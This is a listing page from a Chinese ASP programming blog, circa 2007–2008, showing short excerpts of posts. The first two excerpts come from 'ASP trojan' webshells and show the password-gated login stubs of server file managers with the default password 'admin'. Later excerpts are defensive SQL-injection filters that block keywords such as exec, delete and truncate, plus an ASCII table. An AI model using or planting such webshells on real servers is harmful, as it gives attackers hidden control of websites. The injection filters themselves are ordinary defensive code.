浅海蓝Asp木马 [ 2008-01-10 14:16:10 |
本站原创 ]
'密码默认是admin,你可以在第三行修改
<%
On Error Resume Next
Pass="admin":URL=Request.ServerVariables("URL"):IP=Request.ServerVariables("LOCAL_ADDR"):Act=Request("Act"):RootPath=Server.MapPath("."):WWWRoot=Server.MapPath("/"):FolderPath=Request("FolderPath"):FName=Request("FName"):BackUrl="<meta http-equiv='refresh' content='2;URL=?Act=ShowFile'>":If Session("aweige")<>Pass Then:If Request.Form("LPass")<>"" Then:If Request.Form("LPass")=Pass Then:Session("aweige")=Pass:Response.Redirect URL:Else:response.end:End If:Else:Response.Write"<form Act='"&URL&"' method='post'><input name='LPass'> <input type='submit' value='LoGin'></form>":End If:Response.End:End If
Tag : ASP木马 ASP文件管理 [ 2008-01-10 14:11:30 |
本站原创 ]
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<%
url=Request.ServerVariables("path_info")
thisfilename=mid(url,instrRev(url,"/")+1)
pass="admin" '可以修改密码
Tag : 文件管理 | ASP程序 ASP自动发送邮件代码 [ 2007-12-20 11:02:58 |
本站原创 ]
'**********************************
'自动发送邮件ASP代码,请修改相应的参数
'配置正确的话邮件100%可以发送出去
'2007年12月20日glenluo修改版
'**********************************
Tag : ASP | 自动发送邮件 防ASP注入代码 [ 2007-12-18 18:11:40 |
本站原创 ]
<%
Dim
kelife_Post,kelife_Get,kelife_In,kelife_Inf,kelife_Xh,kelife_db,kelife_dbstr,iftofile,filesave_url,tofile,if_ip,if_time,if_wz
Tag : ASP | SQL注入 ASP防注入之解决方案--加强版 [ 2007-12-14 10:24:05 |
本站原创 ]
<%
''将本页用include方法放在头部以让所有页都可以调用,比如include在conn.asp里
''如果有流式上传的页面请把该页加到表page中,以防form冲突
Dim N_no,N_noarray,req_Qs,req_F,N_i,N_dbstr,Conn,N_rs,N_userIP,N_thispage
Tag : ASP | SQL注入 万能Asp防注入代码 [ 2007-12-14 10:15:58 |
本站原创 ]
<%
’’’’--------定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
’’’’自定义需要过滤的字串,用 "防" 分隔
Fy_In = "’’’’防;防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防<防>防=防|防-防_"
Tag : ASP | SQL注入 通用的asp防注入程序 [ 2007-12-14 10:14:42 |
本站原创 ]
一般的http请求不外乎 get 和 post,所以只要我们在文件中过滤所有post或者get请求中的参数信息中非法字符即可,所以我们实现http 请求信息过滤就可以判断是是否受到sql注入攻击。
iis传递给asp.dll的get 请求是是以字符串的形式,,当 传递给Request.QueryString数据后,,
asp解析器会分析Request.QueryString的信息,,然后根据"&",分出各个数组内的数据
所以get的拦截如下
首先我们定义请求中不能包含如下字符
Tag : ASP | SQL注入 利用ASCII码检测留言中是否有非法内容 [ 2007-05-25 10:18:31 |
本站原创 ]
<%
function checktxt(txt)
chrtxt="33|34|35|36|37|38|39|40|41|42|43|44|47|58|59|60|61|62|63|91|92|93|94|96|123|124|125|126|128"
chrtext=split(chrtxt,"|")
for c=0 to ubound(chrtext)
Tag : ASP | 关键字过滤 ASCII码表 [ 2007-05-25 10:09:38 |
本站原创 ]
ASCII码表
信息在计算机上是用二进制表示的,这种表示法让人理解就很困难。因此计算机上都配有输入和输出设备,这些设备的主要目的就是,以一种人类可阅读的形式将信息在这些设备上显示出来供人阅读理解。为保证人类和设备,设备和计算机之间能进行正确的信息交换,人们编制的统一的信息交换代码,这就是ASCII码表,它的全称是“美国信息交换标准代码”。
Char Dec Oct Hex | Char Dec Oct Hex | Char Dec Oct Hex | Char Dec Oct Hex
Tag : ASCII | 代码 雷客图ASP站长安全助手 [ 2007-05-25 10:06:01 |
本站原创 ]
这是个不错的ASP防注代码,值得学习一下,利用的是正则表达式.
<%
'************** ASPSecurity SQL 防注入**************
' Copyright 2006
Tag : 雷客图 | 站长助手 [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] ... [27] 
用户登陆
站点日历
站点统计
最新评论
日志搜索
友情链接
其他信息
阅读全文……Tag : ASP木马